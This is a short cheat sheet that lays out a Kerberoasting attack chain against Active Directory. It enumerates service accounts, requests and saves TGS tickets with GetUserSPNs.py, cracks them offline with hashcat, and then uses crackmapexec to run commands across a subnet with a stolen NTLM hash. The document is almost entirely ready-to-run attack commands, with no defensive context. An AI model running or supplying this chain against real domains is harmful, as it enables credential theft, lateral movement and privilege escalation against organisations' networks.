Kerberoasting Chains

Enumerate SPNs, extract TGS, crack, and pivot to higher privileges.

Get-ADUser -Filter "ServicePrincipalName -like '*'" -Properties ServicePrincipalName | Select SamAccountName,ServicePrincipalName
GetUserSPNs.py domain.local/user:pass -dc-ip 192.168.10.10 -request -outputfile tgs.hashes

hashcat -m 13100 tgs.hashes wordlist.txt -O --session kerberoast
crackmapexec winrm 192.168.10.0/24 -u svc_sql -H <NTLM> --exec-method atexec --command whoami